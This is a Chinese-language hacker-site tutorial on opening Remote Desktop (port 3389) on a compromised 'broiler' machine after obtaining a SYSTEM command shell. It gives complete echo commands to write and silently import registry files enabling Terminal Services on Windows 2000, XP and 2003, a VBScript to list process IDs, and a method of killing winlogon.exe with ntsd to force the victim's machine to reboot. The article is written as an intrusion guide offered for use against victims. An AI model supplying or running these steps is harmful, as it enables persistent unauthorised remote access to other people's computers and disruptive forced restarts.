主页 PC知识 网管技术 黑客帝国 安全技术 开放系统 程序设计 搜索 技术论坛

 

相关联接
 
RHU本级分类

新手入门
入侵实例
工具使用
安全防范
黑客人物
软件破解
漏洞研究
 
RHU阅读排行
·穿透防火墙的数据传输方法(附源码)
·简介For命令具体格式以及在Windows中的妙用
·2003gui界面下手工开3389(图)
·用dos命令破解远程NT用户密码
·劫持数据库实现跨站攻击实例图解
·利用ICMP请求报文探测主机操作系统
·CGI漏洞攻击手册version-0.02
·如何突破一个有限制的SHELL
·SSL/TLS/WTLS原理
·在肉鸡上安装隐蔽的ftp服务器

 
 
RHU最新文章
·禁止让瑞星2008随机启动的绝招
·经典入侵检测术语全接触
·黑客域名劫持攻击详细步骤
·通过注射改管理员密码
·简简单单清除肉鸡上的日志文件
·[基础]Mysql 基本的常用命令
·autorun.inf操作手册
·入侵中快速获得Web根目录的技巧
·浅谈javascript函数劫持
·溢出的原理技术大全

 
 
RHU相关搜索









 
 
RHU广而告之

 
 
>您的位置:首页 -> 黑客帝国-> 新手入门
黑客必学—开启肉鸡终端全攻略

作者:RHU-TAC编辑员 来自:RHU网络采集 时间:2005-8-13 双击滚屏 收藏本页 字体:

点击 查看RHU2004全年文章


今天介绍的这种开终端的方法,绿色,环保,无污染~~

  不须上传任何文件开启终端的方法适合win2k,xp,2003.

  本文前提是已经通过某种方法得到了对方的一个SYSTEM权限的CMDSHELL~~

  在无须传任何文件的情况下开启终端服务。

  一、win 2k下终端开启终端

  首先用ECHO写一个3389.reg文件,然后导入到注册表,echo代码如下:

  echo Windows Registry Editor Version 5.00 >>3389.reg

echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>3389.reg

  echo "Enabled"="0" >>3389.reg

  echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] >>3389.reg

  echo "ShutdownWithoutLogon"="0" >>3389.reg

  echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer] >>3389.reg

  echo "EnableAdminTSRemote"=dword:00000001 >>3389.reg

  echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] >>3389.reg

  echo "TSEnabled"=dword:00000001 >>3389.reg

  echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>3389.reg

  echo "Start"=dword:00000002 >>3389.reg

  echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService] >>3389.reg

  echo "Start"=dword:00000002 >>3389.reg

  echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>3389.reg

  echo "Hotkey"="1" >>3389.reg

  echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp] >>3389.reg

  echo "PortNumber"=dword:00000D3D >>3389.reg

  echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] >>3389.reg

  echo "PortNumber"=dword:00000D3D >>3389.reg

  把这些ECHO代码到CMDSHELL下贴粘就可以生成3389.reg文件,接着regedit /s 3389.reg导入注册表。

  (如果要改变终端端口只须把上面的两个D3D都改一下就可以了)

  因为win 2k下开终端不能像XP一样可以立即生效,而是需重启机器后才生效。

  一个简单的办法就是用ntsd.exe(win 2k以上自带的命令)结束一个重要的进程就可以实现机器重启了!!

  比如结束winlogon.exe,lsass.exe也可以但结束后会跳出重启倒计时(不太好~)

  winlogon.exe被关闭后机器立刻强制重启了

  命令执行格式为ntsd -c q -p PID
那如何知道winlogon.exe的PID进程号呢~

  以下这个脚本可以列举当前所有进程的PID:

  wscript.echo "PID  ProcessName"

  for each ps in getobject("winmgmts:\\.\root\cimv2:win32_process").instances_

  wscript.echo ps.handle&vbtab&ps.name

  next

  在CMDSHELL窗口下贴上如下ECHO代码就可以得到查看进程PID的脚本1.vbe:

  echo wscript.echo "PID  ProcessName">>1.vbe

  echo for each ps in getobject("winmgmts:\\.\root\cimv2:win32_process").instances_ >>1.vbe

  echo wscript.echo ps.handle^&vbtab^&ps.name>>1.vbe

  echo next>>1.vbe

  生成1.vbe后请检查一下echo出来的脚本是否有错(才四行,对一下上面给出的就可以了)。

  运行1.vbe得到如下运行结果:

  C:\WINNT\system32>cscript 1.vbe

  cscript 1.vbe

  Microsoft (R) Windows 脚本宿主版本 5.1 for Windows

  版权所有(C) Microsoft Corporation 1996-1999. All rights reserved.

  PID  ProcessName

  0   System Idle Process

  8   System

  152  smss.exe

  180  csrss.exe

  200  winlogon.exe

  228  services.exe

  240  lsass.exe

  424  svchost.exe

  472  spoolsv.exe

  512  msdtc.exe

616  svchost.exe

  628  KAVSvc.EXE

  660  llssrv.exe

  692  nvsvc32.exe

  728  regsvc.exe

  748  MSTask.exe

  776  alter.exe

  900  svchost.exe

  916  WinMgmt.exe

  1088  Dfssvc.exe

  484  Explorer.EXE

  1444  mdm.exe

  1340  Server.exe

  1224  ibguard.exe

  1252  KAVSvcUI.EXE

  1256  ibserver.exe

  1336  internat.exe

  1204  Uspds.exe

  720  bar.exe

  1288  dllhost.exe

  1580  inetinfo.exe

  1672  cmd.exe

  1464  pppoe.exe

  1704  regedit.exe

  316  cscript.exe

  从上面可以看出当前winlogon.exe的PID号为200运行命令ntsd -c q -p 200 (这里的200要替换为winlogon.exe进程对就的PID啦)过会儿机器马

  上重启了(ntsd.exe是WIN自带的可用来结束任意级别进程)等着收获吧~~

  二、winxp和win2003终端开启

  开启的REG文件代码如下:

  Windows Registry Editor Version 5.00

  [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]

  "fDenyTSConnections"=dword:00000000

  [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp]

  "PortNumber"=dword:00000D3D

  [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp]

  "PortNumber"=dword:00000D3D

  用以下ECHO代码写一个REG文件:

  echo Windows Registry Editor Version 5.00>>3389.reg

  echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]>>3389.reg

  echo "fDenyTSConnections"=dword:00000000>>3389.reg

  echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp]>>3389.reg

  echo "PortNumber"=dword:00000d3d>>3389.reg

  echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp]>>3389.reg

  echo "PortNumber"=dword:00000d3d>>3389.reg

  regedit /s 3389.reg

  del 3389.reg

  这样xp和2003开启终端是不用重启的如果你想改端口只需把上面的两个PortNumber对应的D3D改成相应十进制数的十六进制形式就可以了!用计算器转换吧。XP下不论开终端还是改终端端口都不需重启,真是太妙了~~呵呵。如果要关闭终闭只需把"fDenyTSConnections"=dword:00000000

  改成"fDenyTSConnections"=dword:00000001



OVER
[1] 页 RedHyphone.Union 投稿邮箱
[特别声明]:
本站文章大多搜索转载自网络中,如果侵犯了您的权利,请告之我们。本站将立即删除。
本站所有转载文章言论不代表本站观点,本站所提供的摄影照片,插画,设计作品,如需使用,请与原作者联系,版权归原作者所有。
查看评论】【向上滚屏】【关闭窗口】【 打印
-相关文章
  • openSUSE 11.1 Final - 正式发布
  • [视频]Opera Mini 4.2 正式版发布
  • dll注入系统进程(开源代码)
  • 认知盲区 解惑双网卡双线路DNS解析
  • FlashFXP 简体中文版 3.7.5 Build 1303 Beta[烈火]
    		•
    -文章评论 (关闭)
    ·还没有相关的评论!

    网上大名:
    红旋风网络技术联盟 RHUTech.Union
     
    Copyright © 2000-2007 RedHyphone.Union All Rights Reserved. 红旋风联盟版权所有.皖ICP备05011033号
    中国红旋风网络技术联盟 | www.RedHyphone.net
    Mailto:Redhyphone@gamil.com